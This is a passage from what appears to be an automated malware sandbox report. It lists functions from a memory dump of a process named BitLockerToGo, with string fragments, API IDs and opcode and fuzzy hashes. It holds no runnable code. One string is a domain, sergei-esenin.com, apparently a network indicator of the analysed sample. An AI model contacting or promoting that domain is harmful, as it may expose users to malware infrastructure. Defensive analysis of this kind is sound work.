                                                                                                                                                          • Instruction Fuzzy Hash: D5A293B46083918BE334CF25D88079FBBE1FB82744F50892DE9D95B250EB748946CB97
                                                                                                                                                          Function 00411C5B Relevance: 17.0, APIs: 1, Strings: 10, Instructions: 451COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                          • String ID: 4 E$4 E$8$:;:9$D'5%$H#Y!$M/_-$T]R#$o+X)$sergei-esenin.com
                                                                                                                                                          • API String ID: 3861434553-420977703
                                                                                                                                                          • Opcode ID: 929db4ef5c2f346abb0207498406edd40ed352c4fa4d8a51e726525cc27c5bfc
                                                                                                                                                          • Instruction ID: b550fdd234e3f7751dd64647aa8f612fe1cd7ee4e9b901a9b95261a5fc48f54b
                                                                                                                                                          • Opcode Fuzzy Hash: 929db4ef5c2f346abb0207498406edd40ed352c4fa4d8a51e726525cc27c5bfc
                                                                                                                                                          • Instruction Fuzzy Hash: 14E114715093818BE330CF2598517EFBBE1AF96304F08496ED4C99B292DB388549CB96
                                                                                                                                                          Function 00429500 Relevance: 15.9, Strings: 12, Instructions: 921COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 17$%*+($%*+($89$@A$SQ$Tt$W@$\2$`q$e{$}s
                                                                                                                                                          • API String ID: 0-2447947820
                                                                                                                                                          • Opcode ID: 074074efc75a1d607161e627ecffb2eea9c4b5eac9bc261c5c3187306e81aff1
                                                                                                                                                          • Instruction ID: 8e1629a34da923ebb6248db9782ee42b7263090a65faaa977153f7420d74e74f
                                                                                                                                                          • Opcode Fuzzy Hash: 074074efc75a1d607161e627ecffb2eea9c4b5eac9bc261c5c3187306e81aff1
                                                                                                                                                          • Instruction Fuzzy Hash: 2D9251B46083918BE334CF25E88079BBBE1FB82744F50892DE9D95B250DB748946CF97
                                                                                                                                                          Function 0043BBD0 Relevance: 15.3, Strings: 12, Instructions: 295COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $ $!$!$"$"$9$<$>$S$e$~
                                                                                                                                                          • API String ID: 0-182234891
                                                                                                                                                          • Opcode ID: a06918ebd65e9151fb0a4498747b54533d6e8a44d64da989032b065c48afe72d
                                                                                                                                                          • Instruction ID: 004accad612a9de8a9b8b549eed32113e0edf3ec314e05e02e8d69aa06fe6d69
                                                                                                                                                          • Opcode Fuzzy Hash: a06918ebd65e9151fb0a4498747b54533d6e8a44d64da989032b065c48afe72d
                                                                                                                                                          • Instruction Fuzzy Hash: 58B1356391C7E04AD311853C8C4434BAED29BEB224F1E9B6EE5E5C73C6D26DC8068797
                                                                                                                                                          Function 0043C2A0 Relevance: 15.3, Strings: 12, Instructions: 262COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: %$%$%$($($($*$*$*$+$+$+
                                                                                                                                                          • API String ID: 2994545307-447118901
                                                                                                                                                          • Opcode ID: aee4ac08dc17925e6190589803c0570aa7b725fd6dc2483d5e300cc12250f798
                                                                                                                                                          • Instruction ID: 2486959a27043cca44fb89aa19ea91e4d3da2ac20e1f8ffc38b72658732b114d
                                                                                                                                                          • Opcode Fuzzy Hash: aee4ac08dc17925e6190589803c0570aa7b725fd6dc2483d5e300cc12250f798
                                                                                                                                                          • Instruction Fuzzy Hash: 9BA14972E083508FDB04CBB8D9943AE7BA29B59310F18952ED852B73C2D67D89418B5A
                                                                                                                                                          Function 00427C6E Relevance: 14.6, Strings: 11, Instructions: 821COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+($%*+($))?=$*,( $-)+=$30"w$4 E$=!?8$JA$Ui&$$p%3!
                                                                                                                                                          • API String ID: 0-1295206442
                                                                                                                                                          • Opcode ID: c221462338ad4c8b5cd29fe6489054317b65ca38611f225026e2ac69ad7d34be
                                                                                                                                                          • Instruction ID: d0cd266b22e196b237f71bebb6b53914cf3b2d7ec89c382b9fd22ac64e39f4e5
                                                                                                                                                          • Opcode Fuzzy Hash: c221462338ad4c8b5cd29fe6489054317b65ca38611f225026e2ac69ad7d34be
                                                                                                                                                          • Instruction Fuzzy Hash: 1B42FF35608311DFD314CF29E88062BB3E1FB8A315F49897DE9818B3A1DB39D951CB99
                                                                                                                                                          Function 004252E2 Relevance: 13.3, Strings: 10, Instructions: 832COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: O*A$$[.]$'C$E$'G1Y$0_!Q$1K-M$D3C5$E{G}$F7UI$kW1i
                                                                                                                                                          • API String ID: 0-1249160011
                                                                                                                                                          • Opcode ID: cef91675cc742cf9d38545d402b497758810f75487798740467cb380df2b7709
                                                                                                                                                          • Instruction ID: 82250515a93091df88fabb0c535042b43517f5aaa012e4b8162840fb2d5dc65f
                                                                                                                                                          • Opcode Fuzzy Hash: cef91675cc742cf9d38545d402b497758810f75487798740467cb380df2b7709
                                                                                                                                                          • Instruction Fuzzy Hash: 023215B0A01621CBCB24CF24D892677B7B1FF52324B98924DD8964F799E378D841CBD5
                                                                                                                                                          Function 0042C931 Relevance: 12.9, Strings: 10, Instructions: 368COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $TG2$%*+($&PiD$/T,^$2LA3$cK_+$cLEC$hk$wj11${u
                                                                                                                                                          • API String ID: 0-591834355
                                                                                                                                                          • Opcode ID: 56891e7575722d1a4bbc9ffd67b9cb0c8f691d9cfbf52ec6349a97757e347e25
                                                                                                                                                          • Instruction ID: f7c7b0fd7ae7e7777ea6d31355aed18d00fb6db4c650e836235c3fc545025d86
                                                                                                                                                          • Opcode Fuzzy Hash: 56891e7575722d1a4bbc9ffd67b9cb0c8f691d9cfbf52ec6349a97757e347e25
                                                                                                                                                          • Instruction Fuzzy Hash: D7D11CB5A08390DFD310CF15E88071BBBE2BFC5304F554A6CE9986B392D7789905CB96
                                                                                                                                                          Function 00423C30 Relevance: 12.0, Strings: 9, Instructions: 710COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 'LB$:B$CRB$UPB$nMB$xKB$xKB$JB$JB
                                                                                                                                                          • API String ID: 0-1456711487
                                                                                                                                                          • Opcode ID: ea8ab4b21973b3d4ed9713f54dfe0711755f8c36a46528e97b7f2dcbc62eb4a6
                                                                                                                                                          • Instruction ID: adc0191423c1111c1edda4d90c42e98c5c363acfeb04a45571ad32912296f38d
                                                                                                                                                          • Opcode Fuzzy Hash: ea8ab4b21973b3d4ed9713f54dfe0711755f8c36a46528e97b7f2dcbc62eb4a6
                                                                                                                                                          • Instruction Fuzzy Hash: AA724C70618B808ED362CB3C88497D7BFD56B6A324F084A5DE0FA8B3D2C7796505C766
                                                                                                                                                          Function 00430120 Relevance: 11.0, Strings: 8, Instructions: 1007COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: m''$#,C$*&?$$7()&$VB<2$jzz$mYZ$Ncq
                                                                                                                                                          • API String ID: 0-1929610824
                                                                                                                                                          • Opcode ID: 991d02011c434b777977ef2c1150df104078257aaa44bc71dac0696b797f363d
                                                                                                                                                          • Instruction ID: 5547e381877fc0eb9981a3fcec02d7ceaae60d072df9b1bbf32d0b33c28dd9a4
                                                                                                                                                          • Opcode Fuzzy Hash: 991d02011c434b777977ef2c1150df104078257aaa44bc71dac0696b797f363d
                                                                                                                                                          • Instruction Fuzzy Hash: F9622AB0504B818BD325CF35C4A07A3BBE1EF66304F189A6EC5EB4B382D7786549CB59
                                                                                                                                                          Function 00401000 Relevance: 10.6, Strings: 7, Instructions: 1861COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                                                                                                                                          • API String ID: 0-2517803157
                                                                                                                                                          • Opcode ID: 5ad124dd6aa45d9b712f89ed1f0ee29770164cabd7808a5248561ac8b3f22f36
                                                                                                                                                          • Instruction ID: 56f16ef056ee3eaf6559d4e8f0d8a6991da9a46d0170a777fa7d54308044dc3a
                                                                                                                                                          • Opcode Fuzzy Hash: 5ad124dd6aa45d9b712f89ed1f0ee29770164cabd7808a5248561ac8b3f22f36
                                                                                                                                                          • Instruction Fuzzy Hash: 3FD2C1716083518FD714CE28C48476BBBE2ABC9314F188A3EF495AB3D1D778D945CB86
                                                                                                                                                          Function 0041FAC9 Relevance: 10.4, Strings: 8, Instructions: 431COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0s+q$c/g-$c3g1$d7`5$k;f9$k?y=$x+|)$WU
                                                                                                                                                          • API String ID: 0-2378892908
                                                                                                                                                          • Opcode ID: 0e70f2e38a3ee240281b59a0d8a1a90c947fc99d34855100d43b81ec5e7dd880
                                                                                                                                                          • Instruction ID: ac69dfba032ca6a66a23180f244f2876334a7ab32065901b7a9d070cefd681ca
                                                                                                                                                          • Opcode Fuzzy Hash: 0e70f2e38a3ee240281b59a0d8a1a90c947fc99d34855100d43b81ec5e7dd880
                                                                                                                                                          • Instruction Fuzzy Hash: 9BF1CBB5508390CBE330CF14D8917ABBBE2FF95314F158A2DD98A8B391E7794945CB82
                                                                                                                                                          Function 00421A60 Relevance: 10.4, Strings: 8, Instructions: 354COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ()$/.M$QW$Vn$Ym$ez$g$u|
                                                                                                                                                          • API String ID: 0-1058671686
                                                                                                                                                          • Opcode ID: 27ecd4f31d9b5bd433cb7e7bdea8da5059b2af2be98fe291b93681cb96ec01b3
                                                                                                                                                          • Instruction ID: cd452b8704e9df9e0dc86b8200053fc2b0423d2c2c39d7f3062936c9387ab992
                                                                                                                                                          • Opcode Fuzzy Hash: 27ecd4f31d9b5bd433cb7e7bdea8da5059b2af2be98fe291b93681cb96ec01b3
                                                                                                                                                          • Instruction Fuzzy Hash: C6C1CC75A0C3519FD310CF29D88066BBBE1EF96354F48892CE8C88B352D7788A45CB96
                                                                                                                                                          Function 004122B0 Relevance: 10.3, Strings: 8, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+($;G=E$D$Jsrq$MOnM$Y#Q!$_+])$tScQ
                                                                                                                                                          • API String ID: 0-1576646981
                                                                                                                                                          • Opcode ID: 7b91061fe9585498026cc92b9431f7a5b8a879b43d709b52538ae1dba9bf2de5
                                                                                                                                                          • Instruction ID: 1b6a45d2e03d695898bd57f251a1c6298b42024b71791444424f6922aa453e87
                                                                                                                                                          • Opcode Fuzzy Hash: 7b91061fe9585498026cc92b9431f7a5b8a879b43d709b52538ae1dba9bf2de5
                                                                                                                                                          • Instruction Fuzzy Hash: 3CA1CDB15593809FE328CF11C9A176FBBE1FF80B48F14891CE4C95B291D7B98945CB8A
                                                                                                                                                          Function 0041BAAE Relevance: 10.2, Strings: 8, Instructions: 158COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %$%$($($*$*$+$+
                                                                                                                                                          • API String ID: 0-157184678
                                                                                                                                                          • Opcode ID: 771904273cf5686b33b2d4e4e1e52caa0c0aa27a5d3c936dc4ab86ff94e7f889
                                                                                                                                                          • Instruction ID: 618cac528af066e122b038e705122a8bfd598ba96b038d9d20d3b1cfcb117628
                                                                                                                                                          • Opcode Fuzzy Hash: 771904273cf5686b33b2d4e4e1e52caa0c0aa27a5d3c936dc4ab86ff94e7f889
                                                                                                                                                          • Instruction Fuzzy Hash: 8961E57160D3D08BE3248A24D8953EBBBD1AB96304F18886ED5C69B386DB7D4581878B
                                                                                                                                                          Function 0041BD73 Relevance: 10.2, Strings: 8, Instructions: 157COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %$%$($($*$*$+$+
                                                                                                                                                          • API String ID: 0-157184678
                                                                                                                                                          • Opcode ID: 05a44f2d6d0c77c2411bae58e55dbb80ceeda9b6f23e6e1f0fdaa153d9306c35
                                                                                                                                                          • Instruction ID: 65367fe1622c7fbf0fc276a913f874e9532183b9221f9c59428857634eea6d71
                                                                                                                                                          • Opcode Fuzzy Hash: 05a44f2d6d0c77c2411bae58e55dbb80ceeda9b6f23e6e1f0fdaa153d9306c35
                                                                                                                                                          • Instruction Fuzzy Hash: 8A51077160C3908BD3258E24D9E53EBBBD1EB91304F18886ED5CAC7392DB7D4546CB86
                                                                                                                                                          Function 0041A596 Relevance: 10.2, Strings: 8, Instructions: 156COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: %$%$($($*$*$+$+
                                                                                                                                                          • API String ID: 2994545307-157184678
                                                                                                                                                          • Opcode ID: f55f467813c77472f1d33d89f98ab437b0b2d48317a4611e462e1f450e63769e
                                                                                                                                                          • Instruction ID: 6e706b85d6a58ac68187e701a1cc2ee6e72d2505204f346b59f7f8c8fb7caadc
                                                                                                                                                          • Opcode Fuzzy Hash: f55f467813c77472f1d33d89f98ab437b0b2d48317a4611e462e1f450e63769e
                                                                                                                                                          • Instruction Fuzzy Hash: 1F51787164D3D08BD3258A34D8D53EB7BD1AB92314F18886EC5DA873D2CA7E8592C30B
                                                                                                                                                          Function 0041C596 Relevance: 10.2, Strings: 8, Instructions: 153COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: %$%$($($*$*$+$+
                                                                                                                                                          • API String ID: 2994545307-157184678
                                                                                                                                                          • Opcode ID: b9fb67ced526085a6b7285c34aae30912587b43d3c2c61361ff119072fabdd2a
                                                                                                                                                          • Instruction ID: b3cc6faceddc44ac09f0b41bbbe293cc8016495a8b9c0089908826a44a8b407c
                                                                                                                                                          • Opcode Fuzzy Hash: b9fb67ced526085a6b7285c34aae30912587b43d3c2c61361ff119072fabdd2a
                                                                                                                                                          • Instruction Fuzzy Hash: F0512C7568C3D0CFD3258A24DCE53DB7BD1AB96304F18886EC6CA97382C67D4481874B
                                                                                                                                                          Function 0042AD00 Relevance: 9.2, Strings: 7, Instructions: 413COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+($%*+($QU$VF$be$IG$MK
                                                                                                                                                          • API String ID: 0-1960574425
                                                                                                                                                          • Opcode ID: b1b6ab20a965efc82c991a82a57e6adf424c9a0d0877cb333b9b686d04577da3
                                                                                                                                                          • Instruction ID: 2c159f95dc4f486251bcc05f8c134ce4743777d3867724bfe36385ba4d2009c0
                                                                                                                                                          • Opcode Fuzzy Hash: b1b6ab20a965efc82c991a82a57e6adf424c9a0d0877cb333b9b686d04577da3
                                                                                                                                                          • Instruction Fuzzy Hash: C8D10FB4608341DFE7248F25E891B6BBBB1FB86344F50882DE6C98B351E7348915CB4B
                                                                                                                                                          Function 0042E7C2 Relevance: 8.1, Strings: 6, Instructions: 649COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %*+($FKYW$dB$ftg~$B$B
                                                                                                                                                          • API String ID: 0-494304196
                                                                                                                                                          • Opcode ID: 6791f65a1b5807dccd41d3f54194fe0a5464b609aff219e44d9023bb068a2f7c
                                                                                                                                                          • Instruction ID: c0b6853b26822d3bfcf8420e40008b7e61d574477b86aa2244b4b7830aa898c1
                                                                                                                                                          • Opcode Fuzzy Hash: 6791f65a1b5807dccd41d3f54194fe0a5464b609aff219e44d9023bb068a2f7c
                                                                                                                                                          • Instruction Fuzzy Hash: FD125675A083A1CFC314CF29D85062BBBE1AF86710F094A6DF4D597392D739C945CB86
                                                                                                                                                          Function 00444D60 Relevance: 7.9, Strings: 6, Instructions: 440COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: /.-,$88&$88&$>8&$>8&$P
                                                                                                                                                          • API String ID: 0-229866786
                                                                                                                                                          • Opcode ID: c1929a8017db0aa8727ef4353ac82a9efb3aee44a3ed0dddcac08e96cf22c506
                                                                                                                                                          • Instruction ID: 4a04063e58980ce7e8509433a6f18e5a2714def58631cbd571189d2f086c56e0
                                                                                                                                                          • Opcode Fuzzy Hash: c1929a8017db0aa8727ef4353ac82a9efb3aee44a3ed0dddcac08e96cf22c506
                                                                                                                                                          • Instruction Fuzzy Hash: 54D115326487614BE71ACE18985032FB6D1EBC1714F15863EE8AA9F3C1DB79DC0687C6
                                                                                                                                                          Function 004012F3 Relevance: 7.2, Strings: 5, Instructions: 974COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0$0$0$@$i
                                                                                                                                                          • API String ID: 0-3124195287
                                                                                                                                                          • Opcode ID: c2da2850dada1f92e44961d97f3f77c5df9193eea859a5c84e4ffec80da95993
                                                                                                                                                          • Instruction ID: 0ac56e4cbdef6b80a502429440958087a831d883767d01412d259ca37ed15890
                                                                                                                                                          • Opcode Fuzzy Hash: c2da2850dada1f92e44961d97f3f77c5df9193eea859a5c84e4ffec80da95993
                                                                                                                                                          • Instruction Fuzzy Hash: 7B72B271A083518BC719CE28C59471BBBE1AFC5304F148A6EE8D9A73D1D778DD09CB86
                                                                                                                                                          Function 00401602 Relevance: 6.7, Strings: 5, Instructions: 473COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                          • API String ID: 0-1123320326
                                                                                                                                                          • Opcode ID: 99df6b61dc9cf932a60c5397529fefe357d78dcf3fa2eb2f1b9697ebcf686894
                                                                                                                                                          • Instruction ID: 8d150dfe86a620273aa876613df8e89353f7c8c64259da64b0f6564091b39426
                                                                                                                                                          • Opcode Fuzzy Hash: 99df6b61dc9cf932a60c5397529fefe357d78dcf3fa2eb2f1b9697ebcf686894
                                                                                                                                                          • Instruction Fuzzy Hash: CD02A27060C3918FC718CF29C49425BFBE2AFD9304F18896EE4D9A7392D239D945CB96
                                                                                                                                                          Function 0040134E Relevance: 6.6, Strings: 5, Instructions: 372COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                          • API String ID: 0-3620105454
                                                                                                                                                          • Opcode ID: 2b246fee1e96ab77cbfea3b02b5951998acea595ba4b8d542442ccafe6eddf1f
                                                                                                                                                          • Instruction ID: 482bdeca682f86fd8ddd8e77cf8281ea062763dfda21032ba3aa26e56a1ed631
                                                                                                                                                          • Opcode Fuzzy Hash: 2b246fee1e96ab77cbfea3b02b5951998acea595ba4b8d542442ccafe6eddf1f
                                                                                                                                                          • Instruction Fuzzy Hash: DCD1B17060D3918FC715CF29C48065AFFE1AFD9304F188A6EE4D997392D238D909CB96
                                                                                                                                                          Function 00444460 Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID: /.-,$/.-,$88&$88&$88&
                                                                                                                                                          • API String ID: 2994545307-3163543823
                                                                                                                                                          • Opcode ID: 9de5f1835d50790a1f05f7458c331f9ecbbd1b59609f1199f386c239a140f18a
                                                                                                                                                          • Instruction ID: 3f361f2711ddfdc0f3908fbca8bf341888ca3b725b25a747bded349d3e26c404
                                                                                                                                                          • Opcode Fuzzy Hash: 9de5f1835d50790a1f05f7458c331f9ecbbd1b59609f1199f386c239a140f18a
                                                                                                                                                          • Instruction Fuzzy Hash: 60A14B32A04351ABF724DF54DC81BABB7D1EFC5709F14892EE688D7381E73899018796
                                                                                                                                                          Function 004452A0 Relevance: 5.8, Strings: 4, Instructions: 834COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.2399853829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: "^D$R^D$rTD$WD
